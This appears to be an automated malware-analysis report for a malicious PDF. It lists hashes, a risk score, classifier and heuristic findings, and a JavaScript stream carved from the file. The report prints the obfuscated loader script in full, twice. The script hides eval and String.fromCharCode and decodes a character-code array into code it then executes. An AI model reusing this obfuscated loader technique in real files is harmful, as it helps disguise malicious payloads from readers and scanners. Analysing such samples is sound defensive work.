PDF malware analysis — malicious · 44f259003f497e38

MALICIOUS

PDF

45.2 KB First seen: 2026-05-07

MD5: 190ddd8ac6751bccdc8e5897a11a1b04 SHA-1: 3a7b5610d5ca783f2093884ba3b40bcfd090319f SHA-256: 44f259003f497e3812ffdc0dded7c3ce75fc4299712ad92cf58ee109354cf3b6

86 Risk Score

Malware Insights

This PDF file was flagged as malicious by an ML classifier with high confidence. It contains embedded JavaScript, which is often used to download and execute further payloads. The JavaScript action and embedded JS stream heuristics indicate the presence of malicious scripting within the document. No specific IOCs were extracted, but the presence of JavaScript is a strong indicator of malicious intent.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

Obfuscated Pidief-style JavaScript loader (stage not decoded) high CVE related PDF_PIDIEF_OBFUSCATED_VERSION_GATED_LOADER

PDF JavaScript carries a large opaque encoded stage (a letter-delimited numeric character-code array) that is built to be decoded and eval'd, but no exact Adobe Reader CVE could be attributed because the encoding scheme resisted full static decoding. This is the structural fingerprint of the Pidief / multi-CVE exploit-kit loader family — a version-gated obfuscated JavaScript stage with no benign use. Flagged suspicious on its own; an ML/AV signal or a recovered heap-spray pushes it to malicious.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0xB256 445 bytes

Filename	Kind	Source	Size
`javascript_obj0001_000.js`	pdf-javascript-stream	PDF /JS object 1 at offset 0xB256	445 bytes
SHA-256: `46f8bdd4ed8adb32f13bd956465c2dff2ab13e5ca65e1133616b69bae3d75e82`
Preview script First 1,000 lines of the extracted script qwe = ('nhsthn','ntrht').substr; var g = qwe(); t='le'; a=["e","a","n","b","w",'v']; e=g[a[0]+a[5]+a[1]+t[0]]; adj=''; houxg=('qwrwqr','tit'); e('gab=t'+('qwtwqt','hisundefined').replace(typeof qwe.dagb,'.')+'tit'+t); vklnd=e('String.fr'+gab.substr(0,10)); qrzh = e(gab.substr(10)['replace'](/u/g,',')); e('k=qrzh.length'); for (i = 0; i < k; i+=2) { yfgui = qrzh[i+1] + ('erybjkerl',qrzh[i]); adj += vklnd(yfgui); } e(adj);

SHA-256: 46f8bdd4ed8adb32f13bd956465c2dff2ab13e5ca65e1133616b69bae3d75e82

Preview script

First 1,000 lines of the extracted script

qwe = ('nhsthn','ntrht').substr;
var g = qwe();
t='le';
a=["e","a","n","b","w",'v'];
e=g[a[0]+a[5]+a[1]+t[0]];
adj='';
houxg=('qwrwqr','tit');
e('gab=t'+('qwtwqt','hisundefined').replace(typeof qwe.dagb,'.')+'tit'+t);
vklnd=e('String.fr'+gab.substr(0,10));
qrzh = e(gab.substr(10)['replace'](/u/g,','));
e('k=qrzh.length');
for (i = 0; i < k; i+=2) {
	yfgui = qrzh[i+1] + ('erybjkerl',qrzh[i]);
	adj += vklnd(yfgui);
}
e(adj);

Open this report in the interactive analyzer, or submit your own file for analysis.